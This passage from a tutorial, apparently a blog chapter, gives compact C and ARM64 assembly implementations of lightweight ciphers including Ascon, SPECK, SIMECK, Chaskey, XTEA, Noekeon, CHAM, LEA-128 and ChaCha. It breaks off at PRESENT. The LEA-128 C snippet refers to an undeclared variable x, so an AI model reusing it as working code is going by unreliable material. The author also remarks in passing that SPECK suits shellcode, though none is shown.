    ldr    w2, [sp, x2, lsl 2]  // w2 = e[(i - 1) & 3]
    ldr    w3, [x0, x7, lsl 2]  // w3 = s[i]
    eor    w3, w3, w2           // w3 ^= w2 
    str    w3, [x0, x7, lsl 2]  // s[i] = w3 
    add    w7, w7, 1            // i++
    cmp    w7, 12               // i < 12
    bne    L2

    // Rho west
    // X(s[7], s[4]);
    // X(s[7], s[5]);
    // X(s[7], s[6]);
    ldp    w2, w3, [x0, 16]
    ldp    w4, w5, [x0, 24]
    stp    w5, w2, [x0, 16]
    stp    w3, w4, [x0, 24]

    // Iota
    // s[0] ^= *rc++;
    ldrh   w2, [x8], 2         // load half-word, advance by 2
    ldr    w3, [x0]            // load word
    eor    w3, w3, w2          // xor
    str    w3, [x0]            // store word

    mov    w7, 4
    mov    x1, x0
L3:
    // Chi and Rho east
    // a = s[i+0];
    ldr    w2, [x1]

    // b = s[i+4];
    ldr    w3, [x1, 16]

    // c = R(s[i+8], 21);
    ldr    w4, [x1, 32]
    ror    w4, w4, 21

    // s[i+8] = R((b & ~a) ^ c, 24);
    bic    w5, w3, w2
    eor    w5, w5, w4
    ror    w5, w5, 24
    str    w5, [x1, 32]

    // s[i+4] = R((a & ~c) ^ b, 31);
    bic    w5, w2, w4
    eor    w5, w5, w3
    ror    w5, w5, 31
    str    w5, [x1, 16]

    // s[i+0]^= c & ~b;
    bic    w5, w4, w3
    eor    w5, w5, w2
    str    w5, [x1], 4

    // i--
    subs   w7, w7, 1
    bne    L3

    // X(s[8], s[10]);
    // X(s[9], s[11]);
    ldp    w2, w3, [x0, 32] // 8, 9
    ldp    w4, w5, [x0, 40] // 10, 11
    stp    w2, w3, [x0, 40]
    stp    w4, w5, [x0, 32]

    subs   w9, w9, 1           // r--
    bne    L0                  // r != 0

    // release stack
    add    sp, sp, 16
    ret
    // round constants
rc:
    .hword 0x058, 0x038, 0x3c0, 0x0d0
    .hword 0x120, 0x014, 0x060, 0x02c
    .hword 0x380, 0x0f0, 0x1a0, 0x012

7.5 ASCON

A permutation function designed by Christoph Dobraunig, Maria Eichlseder, Florian Mendel and Martin Schläffer. Ascon uses a sponge-based mode of operation. The recommended key, tag and nonce length is 128 bits. The sponge operates on a state of 320 bits, with injected message blocks of 64 or 128 bits. The core permutation iteratively applies an SPN-based round transformation with a 5-bit S-box and a lightweight linear layer.

Ascon website

#define R(x,n)(((x)>>(n))|((x)<<(64-(n))))
typedef unsigned long long W;

void ascon(void*p) {
    int i;
    W   t0,t1,t2,t3,t4,x0,x1,x2,x3,x4,*s=(W*)p;
    
    // load 320-bit state
    x0=s[0];x1=s[1];x2=s[2];x3=s[3];x4=s[4];
    // apply 12 rounds
    for(i=0;i<12;i++) {
      // add round constant
      x2^=((0xFULL-i)<<4)|i;
      // apply non-linear layer
      x0^=x4;x4^=x3;x2^=x1;
      t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
      x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
      x1^=x0;x0^=x4;x3^=x2;x2=~x2;
      // apply linear diffusion layer
      x0^=R(x0,19)^R(x0,28);x1^=R(x1,61)^R(x1,39);
      x2^=R(x2,1)^R(x2,6);x3^=R(x3,10)^R(x3,17);
      x4^=R(x4,7)^R(x4,41);
    }
    // save 320-bit state
    s[0]=x0;s[1]=x1;s[2]=x2;s[3]=x3;s[4]=x4;
}

This algorithm works really well on the ARM64 architecture. Very simple operations.

  
// ASCON in ARM64 assembly
// 192 bytes

    .arch armv8-a
    .text

    .global ascon

ascon:
    mov    x10, x0
    // load 320-bit state
    ldp    x0, x1, [x10]
    ldp    x2, x3, [x10, 16]
    ldr    x4, [x10, 32]

    // apply 12 rounds
    mov    x11, xzr
L0:
    // add round constant
    // x2^=((0xFULL-i)<<4)|i;
    mov    x12, 0xF
    sub    x12, x12, x11
    orr    x12, x11, x12, lsl 4
    eor    x2, x2, x12

    // apply non-linear layer
    // x0^=x4;x4^=x3;x2^=x1;
    eor    x0, x0, x4
    eor    x4, x4, x3
    eor    x2, x2, x1

    // t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
    bic    x5, x1, x0
    bic    x6, x2, x1
    bic    x7, x3, x2
    bic    x8, x4, x3
    bic    x9, x0, x4

    // x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
    eor    x0, x0, x6
    eor    x1, x1, x7
    eor    x2, x2, x8
    eor    x3, x3, x9
    eor    x4, x4, x5

    // x1^=x0;x0^=x4;x3^=x2;x2=~x2;
    eor    x1, x1, x0
    eor    x0, x0, x4
    eor    x3, x3, x2
    mvn    x2, x2

    // apply linear diffusion layer
    // x0^=R(x0,19)^R(x0,28);
    ror    x5, x0, 19
    eor    x5, x5, x0, ror 28
    eor    x0, x0, x5

    // x1^=R(x1,61)^R(x1,39);
    ror    x5, x1, 61
    eor    x5, x5, x1, ror 39
    eor    x1, x1, x5

    // x2^=R(x2,1)^R(x2,6);
    ror    x5, x2, 1
    eor    x5, x5, x2, ror 6
    eor    x2, x2, x5

    // x3^=R(x3,10)^R(x3,17);
    ror    x5, x3, 10
    eor    x5, x5, x3, ror 17
    eor    x3, x3, x5

    // x4^=R(x4,7)^R(x4,41);
    ror    x5, x4, 7
    eor    x5, x5, x4, ror 41
    eor    x4, x4, x5

    // i++
    add    x11, x11, 1
    // i < 12
    cmp    x11, 12
    bne    L0

    // save 320-bit state
    stp    x0, x1, [x10]
    stp    x2, x3, [x10, 16]
    str    x4, [x10, 32]
    ret

7.6 SPECK

A block cipher from the NSA that was intended to make its way into IoT devices. Designed by Ray Beaulieu, Douglas Shors, Jason Smith, Stefan Treatman-Clark, Bryan Weeks and Louis Wingers.

The SIMON and SPECK Families of Lightweight Block Ciphers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void speck(void*mk,void*p){
  W k[4],*x=p,i,t;
  
  F(4)k[i]=((W*)mk)[i];
  
  F(27)
    *x=(R(*x,8)+x[1])^*k,
    x[1]=R(x[1],29)^*x,
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,29)^k[3],
    k[1]=k[2],k[2]=t;
}

SPECK has been surrounded by controversy since the NSA proposed including it in the ISO/IEC 29192-2 portfolio, however, they are still useful for shellcodes.

// SPECK64/128 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck64

    // speck64(void*mk, void*data);
speck64:
    // load 128-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    w5, w6, [x0]
    ldp    w7, w8, [x0, 8]
    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    w3, wzr              // i=0
L0:
    ror    w2, w2, 8
    add    w2, w2, w4           // x0 = (R(x0, 8) + x1) ^ k0;
    eor    w2, w2, w5           //
    eor    w4, w2, w4, ror 29   // x1 = R(x1, 3) ^ x0;
    mov    w9, w8               // backup k3
    ror    w6, w6, 8
    add    w8, w5, w6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    w8, w8, w3           //
    eor    w5, w8, w5, ror 29   // k0 = R(k0, 3) ^ k3;
    mov    w6, w7               // k1 = k2;
    mov    w7, w9               // k2 = t;
    add    w3, w3, 1            // i++;
    cmp    w3, 27               // i < 27;
    bne    L0

    // save result
    stp    w2, w4, [x1]         // x[0] = x0; x[1] = x1;
    ret

Since there isn’t a huge difference between the two variants, here’s the 128/256 version that works best on 64-bit architectures.

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned long long W;

void speck128(void*mk,void*p){
  W k[4],*x=p,i,t;

  F(4)k[i]=((W*)mk)[i];
  
  F(34)
    x[1]=(R(x[1],8)+*x)^*k,
    *x=R(*x,61)^x[1],
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,61)^k[3],
    k[1]=k[2],k[2]=t;
}

Again, the assembly is almost exactly the same.

  
// SPECK128/256 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck128

    // speck128(void*mk, void*data);
speck128:
    // load 256-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    x5, x6, [x0]
    ldp    x7, x8, [x0, 16]
    // load 128-bit plain text
    ldp    x2, x4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    x3, xzr              // i=0
L0:
    ror    x4, x4, 8
    add    x4, x4, x2           // x1 = (R(x1, 8) + x0) ^ k0;
    eor    x4, x4, x5           //
    eor    x2, x4, x2, ror 61   // x0 = R(x0, 61) ^ x1;
    mov    x9, x8               // backup k3
    ror    x6, x6, 8
    add    x8, x5, x6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    x8, x8, x3           //
    eor    x5, x8, x5, ror 61   // k0 = R(k0, 61) ^ k3;
    mov    x6, x7               // k1 = k2;
    mov    x7, x9               // k2 = t;
    add    x3, x3, 1            // i++;
    cmp    x3, 34               // i < 34;
    bne    L0

    // save result
    stp    x2, x4, [x1]         // x[0] = x0; x[1] = x1;
    ret

The designs are nice, but independent cryptographers suggest there may be weaknesses in these ciphers that only the NSA know about.

7.7 SIMECK

A block cipher designed by Gangqiang Yang, Bo Zhu, Valentin Suder, Mark D. Aagaard, and Guang Gong was published in 2015. According to the authors, SIMECK combines the good design components of both SIMON and SPECK, in order to devise more compact and efficient block ciphers.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)

void simeck(void*mk,void*p){
  unsigned int t,k0,k1,k2,k3,l,r,*k=mk,*x=p;
  unsigned long long s=0x938BCA3083F;

  k0=*k;k1=k[1];k2=k[2];k3=k[3]; 
  r=*x;l=x[1];

  do{
    r^=R(l,1)^(R(l,5)&l)^k0;
    X(l,r);
    t=(s&1)-4;
    k0^=R(k1,1)^(R(k1,5)&k1)^t;    
    X(k0,k1);X(k1,k2);X(k2,k3);
  } while(s>>=1);
  *x=r; x[1]=l;
}

I cannot say if SIMECK is more compact than SIMON in hardware. However, SPECK is clearly more compact in software.

  
// SIMECK in ARM64 assembly
// 100 bytes

    .arch armv8-a
    .text
    .global simeck

simeck:
     // unsigned long long s = 0x938BCA3083F;
     movz    x2, 0x083F
     movk    x2, 0xBCA3, lsl 16
     movk    x2, 0x0938, lsl 32

     // load 128-bit key 
     ldp     w3, w4, [x0]
     ldp     w5, w6, [x0, 8]

     // load 64-bit plaintext 
     ldp     w8, w7, [x1]
L0:
     // r ^= R(l,1) ^ (R(l,5) & l) ^ k0;
     eor     w9, w3, w7, ror 31
     and     w10, w7, w7, ror 27
     eor     w9, w9, w10
     mov     w10, w7
     eor     w7, w8, w9
     mov     w8, w10

     // t1 = (s & 1) - 4;
     // k0 ^= R(k1,1) ^ (R(k1,5) & k1) ^ t1;
     // X(k0,k1); X(k1,k2); X(k2,k3);
     eor     w3, w3, w4, ror 31
     and     w9, w4, w4, ror 27
     eor     w9, w9, w3
     mov     w3, w4
     mov     w4, w5
     mov     w5, w6
     and     x10, x2, 1
     sub     x10, x10, 4
     eor     w6, w9, w10

     // s >>= 1
     lsr     x2, x2, 1
     cbnz    x2, L0

     // save 64-bit ciphertext 
     stp     w8, w7, [x1]
     ret

7.8 CHASKEY

A block cipher designed by Nicky Mouha, Bart Mennink, Anthony Van Herrewege, Dai Watanabe, Bart Preneel and Ingrid Verbauwhede. Although Chaskey is specifically a MAC function, the underlying primitive is a block cipher. What you see below is only encryption, however, it is possible to implement an inverse function for decryption by reversing the function using rol and sub in place of ror and add.

Chaskey: An Efficient MAC Algorithm for 32-bit Microcontrollers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
  
void chaskey(void*mk,void*p){
  unsigned int i,*x=p,*k=mk;

  F(4)x[i]^=k[i];
  F(16)
    *x+=x[1],
    x[1]=R(x[1],27)^*x,
    x[2]+=x[3],
    x[3]=R(x[3],24)^x[2],
    x[2]+=x[1],
    *x=R(*x,16)+x[3],
    x[3]=R(x[3],19)^*x,
    x[1]=R(x[1],25)^x[2],
    x[2]=R(x[2],16);
  F(4)x[i]^=k[i];
}
  
// CHASKEY in ARM64 assembly
// 112 bytes

  .arch armv8-a
  .text

  .global chaskey

  // chaskey(void*mk, void*data);
chaskey:
    // load 128-bit key
    ldp    w2, w3, [x0]
    ldp    w4, w5, [x0, 8]

    // load 128-bit plain text
    ldp    w6, w7, [x1]
    ldp    w8, w9, [x1, 8]

    // xor plaintext with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];
    mov    w10, 16             // i = 16
L0:
    add    w6, w6, w7          // x[0] += x[1];
    eor    w7, w6, w7, ror 27  // x[1]=R(x[1],27) ^ x[0];
    add    w8, w8, w9          // x[2] += x[3];
    eor    w9, w8, w9, ror 24  // x[3]=R(x[3],24) ^ x[2];
    add    w8, w8, w7          // x[2] += x[1];
    ror    w6, w6, 16
    add    w6, w9, w6          // x[0]=R(x[0],16) + x[3];
    eor    w9, w6, w9, ror 19  // x[3]=R(x[3],19) ^ x[0];
    eor    w7, w8, w7, ror 25  // x[1]=R(x[1],25) ^ x[2];
    ror    w8, w8, 16          // x[2]=R(x[2],16);
    subs   w10, w10, 1         // i--
    bne    L0                  // i > 0

    // xor cipher text with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];

    // save 128-bit cipher text
    stp    w6, w7, [x1]
    stp    w8, w9, [x1, 8]
    ret

7.9 XTEA

A block cipher designed by Roger Needham and David Wheeler. It was published in 1998 as a response to weaknesses found in the Tiny Encryption Algorithm (TEA). XTEA compared to its predecessor TEA contains a more complex key-schedule and rearrangement of shifts, XORs, and additions. The implementation here uses 32 rounds.

Tea Extensions

void xtea(void*mk,void*p){
  unsigned int t,r=65,s=0,*k=mk,*x=p;

  while(--r)
    t=x[1],
    x[1]=*x+=((((t<<4)^(t>>5))+t)^
    (s+k[((r&1)?s+=0x9E3779B9,
    s>>11:s)&3])),*x=t;
}

Although the round counter r is initialized to 65, it is only performing 32 rounds of encryption. If 64 rounds were required, then r should be initialized to 129 (64*2+1). Perhaps it would make more sense to allow a number of rounds as a parameter, but this is simply for illustration.

  
// XTEA in ARM64 assembly
// 92 bytes

    .arch armv8-a
    .text

    .equ ROUNDS, 32

    .global xtea

    // xtea(void*mk, void*data);
xtea:
    mov    w7, ROUNDS * 2

    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0  = x[0], x1 = x[1];
    mov    w3, wzr              // sum = 0;
    ldr    w5, =0x9E3779B9      // c   = 0x9E3779B9;
L0:
    mov    w6, w3               // t0 = sum;
    tbz    w7, 0, L1            // if ((i & 1)==0) goto L1;

    // the next 2 only execute if (i % 2) is not zero
    add    w3, w3, w5           // sum += 0x9E3779B9;
    lsr    w6, w3, 11           // t0 = sum >> 11
L1:
    and    w6, w6, 3            // t0 %= 4
    ldr    w6, [x0, x6, lsl 2]  // t0 = k[t0];
    add    w8, w3, w6           // t1 = sum + t0
    mov    w6, w4, lsl 4        // t0 = (x1 << 4)
    eor    w6, w6, w4, lsr 5    // t0^= (x1 >> 5)
    add    w6, w6, w4           // t0+= x1
    eor    w6, w6, w8           // t0^= t1
    mov    w8, w4               // backup x1
    add    w4, w6, w2           // x1 = t0 + x0

    // XCHG(x0, x1)
    mov    w2, w8               // x0 = x1
    subs   w7, w7, 1
    bne    L0                   // i > 0
    stp    w2, w4, [x1]
    ret

7.10 NOEKEON

A block cipher designed by Joan Daemen, Michaël Peeters, Gilles Van Assche and Vincent Rijmen.

Noekeon website

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))

void noekeon(void*mk,void*p){
  unsigned int a,b,c,d,t,*k=mk,*x=p;
  unsigned char rc=128;

  a=*x;b=x[1];c=x[2];d=x[3];

  for(;;) {
    a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    b^=t;d^=t;a^=k[0];b^=k[1];
    c^=k[2];d^=k[3];t=b^d;
    t^=R(t,8)^R(t,24);a^=t;c^=t;
    if(rc==212)break;
    rc=((rc<<1)^((rc>>7)*27));
    b=R(b,31);c=R(c,27);d=R(d,30);
    b^=~((d)|(c));t=d;d=a^c&b;a=t;
    c^=a^b^d;b^=~((d)|(c));a^=c&b;
    b=R(b,1);c=R(c,5);d=R(d,2);
  }
  *x=a;x[1]=b;x[2]=c;x[3]=d;
}

NOEKEON can be implemented quite well for both INTEL and ARM architectures.

  
// NOEKEON in ARM64 assembly
// 212 bytes

    .arch armv8-a
    .text

    .global noekeon

noekeon:
    mov    x12, x1

    // load 128-bit key
    ldp    w4, w5, [x0]
    ldp    w6, w7, [x0, 8]

    // load 128-bit plain text
    ldp    w2, w3, [x1, 8]
    ldp    w0, w1, [x1]

    // c = 128
    mov    w8, 128
    mov    w9, 27
L0:
    // a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    eor    w0, w0, w8
    eor    w10, w0, w2
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24

    // b^=t;d^=t;a^=k[0];b^=k[1];
    eor    w1, w1, w10
    eor    w3, w3, w10
    eor    w0, w0, w4
    eor    w1, w1, w5

    // c^=k[2];d^=k[3];t=b^d;
    eor    w2, w2, w6
    eor    w3, w3, w7
    eor    w10, w1, w3

    // t^=R(t,8)^R(t,24);a^=t;c^=t;
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24
    eor    w0, w0, w10
    eor    w2, w2, w10

    // if(rc==212)break;
    cmp    w8, 212
    beq    L1

    // rc=((rc<<1)^((rc>>7)*27));
    lsr    w10, w8, 7
    mul    w10, w10, w9
    eor    w8, w10, w8, lsl 1
    uxtb   w8, w8

    // b=R(b,31);c=R(c,27);d=R(d,30);
    ror    w1, w1, 31
    ror    w2, w2, 27
    ror    w3, w3, 30

    // b^=~(d|c);t=d;d=a^(c&b);a=t;
    orr    w10, w3, w2
    eon    w1, w1, w10
    mov    w10, w3
    and    w3, w2, w1
    eor    w3, w3, w0
    mov    w0, w10

    // c^=a^b^d;b^=~(d|c);a^=c&b;
    eor    w2, w2, w0
    eor    w2, w2, w1
    eor    w2, w2, w3
    orr    w10, w3, w2
    eon    w1, w1, w10
    and    w10, w2, w1
    eor    w0, w0, w10

    // b=R(b,1);c=R(c,5);d=R(d,2);
    ror    w1, w1, 1
    ror    w2, w2, 5
    ror    w3, w3, 2
    b      L0
L1:
    // *x=a;x[1]=b;x[2]=c;x[3]=d;
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]
    ret

7.11 CHAM

A block cipher designed by Bonwook Koo, Dongyoung Roh, Hyeonjin Kim, Younghoon Jung, Dong-Geon Lee, and Daesung Kwon.

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void cham(void*mk,void*p){
  W rk[8],*w=p,*k=mk,i,t;

  F(4)
    t=k[i]^R(k[i],31),
    rk[i]=t^R(k[i],24),
    rk[(i+4)^1]=t^R(k[i],21);
  F(80)
    t=w[3],w[0]^=i,w[3]=rk[i&7],
    w[3]^=R(w[1],(i&1)?24:31),
    w[3]+=w[0],
    w[3]=R(w[3],(i&1)?31:24),
    w[0]=w[1],w[1]=w[2],w[2]=t;
}

This algorithm works better for 32-bit ARM where conditional execution of all instructions is supported.

  
// CHAM 128/128 in ARM64 assembly
// 160 bytes 

    .arch armv8-a
    .text
    .global cham

    // cham(void*mk,void*p);
cham:
    sub    sp, sp, 32
    mov    w2, wzr
    mov    x8, x1
L0:
    // t=k[i]^R(k[i],31),
    ldr    w5, [x0, x2, lsl 2]
    eor    w6, w5, w5, ror 31

    // rk[i]=t^R(k[i],24),
    eor    w7, w6, w5, ror 24
    str    w7, [sp, x2, lsl 2]

    // rk[(i+4)^1]=t^R(k[i],21);
    eor    w7, w6, w5, ror 21
    add    w5, w2, 4
    eor    w5, w5, 1
    str    w7, [sp, x5, lsl 2]

    // i++
    add    w2, w2, 1
    // i < 4
    cmp    w2, 4
    bne    L0

    ldp    w0, w1, [x8]
    ldp    w2, w3, [x8, 8]

    // i = 0
    mov    w4, wzr
L1:
    tst    w4, 1

    // t=w[3],w[0]^=i,w[3]=rk[i%8],
    mov    w5, w3
    eor    w0, w0, w4
    and    w6, w4, 7
    ldr    w3, [sp, x6, lsl 2]

    // w[3]^=R(w[1],(i & 1) ? 24 : 31),
    mov    w6, w1, ror 24
    mov    w7, w1, ror 31
    csel   w6, w6, w7, ne
    eor    w3, w3, w6

    // w[3]+=w[0],
    add    w3, w3, w0

    // w[3]=R(w[3],(i & 1) ? 31 : 24),
    mov    w6, w3, ror 31
    mov    w7, w3, ror 24
    csel   w3, w6, w7, ne

    // w[0]=w[1],w[1]=w[2],w[2]=t;
    mov    w0, w1
    mov    w1, w2
    mov    w2, w5

    // i++ 
    add    w4, w4, 1
    // i < 80
    cmp    w4, 80
    bne    L1

    stp    w0, w1, [x8]
    stp    w2, w3, [x8, 8]
    add    sp, sp, 32
    ret

7.12 LEA-128

A block cipher designed by Deukjo Hong, Jung-Keun Lee, Dong-Chan Kim, Daesung Kwon, Kwon Ho Ryu, and Dong-Geon Lee.

LEA: A 128-Bit Block Cipher for Fast Encryption on Common Processors

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void lea128(void*mk,void*p){
  W r,t,*w=p,*k=mk;
  W c[4]=
    {0xc3efe9db,0x88c4d604,
     0xe789f229,0xc6f98763};

  for(r=0;r<24;r++){
    t=c[r%4];
    c[r%4]=R(t,28);
    k[0]=R(k[0]+t,31);
    k[1]=R(k[1]+R(t,31),29);
    k[2]=R(k[2]+R(t,30),26);
    k[3]=R(k[3]+R(t,29),21);      
    t=x[0];
    w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    w[3]=t;
  }
}

Everything here is very straight forward. All Add, Rotate, Xor operations.

// LEA-128/128 in ARM64 assembly
// 224 bytes

    .arch armv8-a

    // include the MOVL macro
    .include "../../include.inc"

    .text
    .global lea128

lea128:
    mov    x11, x0
    mov    x12, x1

    // allocate 16 bytes
    sub    sp, sp, 4*4

    // load immediate values
    movl   w0, 0xc3efe9db
    movl   w1, 0x88c4d604
    movl   w2, 0xe789f229
    movl   w3, 0xc6f98763

    // store on stack
    str    w0, [sp    ]
    str    w1, [sp,  4]
    str    w2, [sp,  8]
    str    w3, [sp, 12]

    // for(r=0;r<24;r++) {
    mov    w8, wzr

    // load 128-bit key
    ldp    w4, w5, [x11]
    ldp    w6, w7, [x11, 8]

    // load 128-bit plaintext
    ldp    w0, w1, [x12]
    ldp    w2, w3, [x12, 8]
L0:
    // t=c[r%4];
    and    w9, w8, 3
    ldr    w10, [sp, x9, lsl 2]

    // c[r%4]=R(t,28);
    mov    w11, w10, ror 28
    str    w11, [sp, x9, lsl 2]

    // k[0]=R(k[0]+t,31);
    add    w4, w4, w10
    ror    w4, w4, 31

    // k[1]=R(k[1]+R(t,31),29);
    ror    w11, w10, 31
    add    w5, w5, w11
    ror    w5, w5, 29

    // k[2]=R(k[2]+R(t,30),26);
    ror    w11, w10, 30
    add    w6, w6, w11
    ror    w6, w6, 26

    // k[3]=R(k[3]+R(t,29),21);
    ror    w11, w10, 29
    add    w7, w7, w11
    ror    w7, w7, 21

    // t=x[0];
    mov    w10, w0

    // w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    eor    w0, w0, w4
    eor    w9, w1, w5
    add    w0, w0, w9
    ror    w0, w0, 23

    // w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    eor    w1, w1, w6
    eor    w9, w2, w5
    add    w1, w1, w9
    ror    w1, w1, 5

    // w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    eor    w2, w2, w7
    eor    w3, w3, w5
    add    w2, w2, w3
    ror    w2, w2, 3

    // w[3]=t;
    mov    w3, w10

    // r++
    add    w8, w8, 1
    // r < 24
    cmp    w8, 24
    bne    L0

    // save 128-bit ciphertext
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]

    add    sp, sp, 4*4
    ret

7.13 CHACHA

A stream cipher designed by Daniel Bernstein and published in 2008. This along with Poly1305 for authentication has become a drop in replacement on handheld devices for AES-128-GCM where AES native instructions are unavailable. The version implemented here is based on a description provided in RFC8439 that uses a 256-bit key, a 32-bit counter and 96-bit nonce.

The ChaCha family of stream ciphers.

ChaCha20 and Poly1305 for IETF Protocols

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)
typedef unsigned int W;

void P(W*s,W*x){
    W a,b,c,d,i,t,r;
    W v[8]={0xC840,0xD951,0xEA62,0xFB73,
            0xFA50,0xCB61,0xD872,0xE943};
            
    F(16)x[i]=s[i];
    
    F(80) {
      d=v[i%8];
      a=(d&15);b=(d>>4&15);
      c=(d>>8&15);d>>=12;
      
      for(r=0x19181410;r;r>>=8)
        x[a]+=x[b],
        x[d]=R(x[d]^x[a],(r&255)),
        X(a,c),X(b,d);
    }
    F(16)x[i]+=s[i];
    s[12]++;
}
void chacha(W l,void*in,void*state){
    unsigned char c[64],*p=in;
    W i,r,*s=state,*k=in;

    if(l) {
      while(l) {
        P(s,(W*)c);
        r=(l>64)?64:l;
        F(r)*p++^=c[i];
        l-=r;
      }
    } else {
      s[0]=0x61707865;s[1]=0x3320646E;
      s[2]=0x79622D32;s[3]=0x6B206574;
      F(12)s[i+4]=k[i];
    }
}

The permutation function makes use of the UBFX instruction.

// ChaCha in ARM64 assembly 
// 348 bytes

 .arch armv8-a
 .text
 .global chacha

 .include "../../include.inc"

P:
    adr     x13, cc_v

    // F(16)x[i]=s[i];
    mov     x8, 0
P0:
    ldr     w14, [x2, x8, lsl 2]
    str     w14, [x3, x8, lsl 2]

    add     x8, x8, 1
    cmp     x8, 16
    bne     P0

    mov     x8, 0
P1:
    // d=v[i%8];
    and     w12, w8, 7
    ldrh    w12, [x13, x12, lsl 1]

    // a=(d&15);b=(d>>4&15);
    // c=(d>>8&15);d>>=12;
    ubfx    w4, w12, 0, 4
    ubfx    w5, w12, 4, 4
    ubfx    w6, w12, 8, 4
    ubfx    w7, w12, 12, 4

    movl    w10, 0x19181410
P2:
    // x[a]+=x[b],
    ldr     w11, [x3, x4, lsl 2]
    ldr     w12, [x3, x5, lsl 2]
    add     w11, w11, w12
    str     w11, [x3, x4, lsl 2]

    // x[d]=R(x[d]^x[a],(r&255)),
    ldr     w12, [x3, x7, lsl 2]
    eor     w12, w12, w11
    and     w14, w10, 255
    ror     w12, w12, w14
    str     w12, [x3, x7, lsl 2]

    // X(a,c),X(b,d);
    stp     w4, w6, [sp, -16]!
    ldp     w6, w4, [sp], 16
    stp     w5, w7, [sp, -16]!
    ldp     w7, w5, [sp], 16

    // r >>= 8
    lsr    w10, w10, 8
    cbnz   w10, P2

    // i++
    add    x8, x8, 1
    // i < 80
    cmp    x8, 80
    bne    P1

    // F(16)x[i]+=s[i];
    mov    x8, 0
P3:
    ldr    w11, [x2, x8, lsl 2]
    ldr    w12, [x3, x8, lsl 2]
    add    w11, w11, w12
    str    w11, [x3, x8, lsl 2]

    add    x8, x8, 1
    cmp    x8, 16
    bne    P3

    // s[12]++;
    ldr    w11, [x2, 12*4]
    add    w11, w11, 1
    str    w11, [x2, 12*4]
    ret
cc_v:
    .2byte 0xC840, 0xD951, 0xEA62, 0xFB73
    .2byte 0xFA50, 0xCB61, 0xD872, 0xE943

    // void chacha(int l, void *in, void *state);
chacha:
    str    x30, [sp, -96]!
    cbz    x0, L2

    add    x3, sp, 16

    mov    x9, 64
L0:
    // P(s,(W*)c);
    bl     P

    // r=(l > 64) ? 64 : l;
    cmp    x0, 64
    csel   x10, x0, x9, ls

    // F(r)*p++^=c[i];
    mov    x8, 0
L1:
    ldrb   w11, [x3, x8]
    ldrb   w12, [x1]
    eor    w11, w11, w12
    strb   w11, [x1], 1

    add    x8, x8, 1
    cmp    x8, x10
    bne    L1

    // l-=r;
    subs   x0, x0, x10
    bne    L0
    beq    L4
L2:
    // s[0]=0x61707865;s[1]=0x3320646E;
    movl   w11, 0x61707865
    movl   w12, 0x3320646E
    stp    w11, w12, [x2]

    // s[2]=0x79622D32;s[3]=0x6B206574;
    movl   w11, 0x79622D32
    movl   w12, 0x6B206574
    stp    w11, w12, [x2, 8]

    // F(12)s[i+4]=k[i];
    mov    x8, 16
    sub    x1, x1, 16
L3:
    ldr    w11, [x1, x8]
    str    w11, [x2, x8]
    add    x8, x8, 4
    cmp    x8, 64
    bne    L3
L4:
    ldr    x30, [sp], 96
    ret

7.14 PRESENT

A block cipher specifically designed for hardware and published in 2007. Why implement a hardware cipher? PRESENT is a 64-bit block cipher that can be implemented reasonably well on any 64-bit architecture. Although the data and key are byte swapped before being processed using the REV instruction, stripping this should not affect security of the cipher.

PRESENT: An Ultra-Lightweight Block Cipher

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

typedef unsigned long long W;
typedef unsigned char B;

B sbox[16] =
  {0xc,0x5,0x6,0xb,0x9,0x0,0xa,0xd,
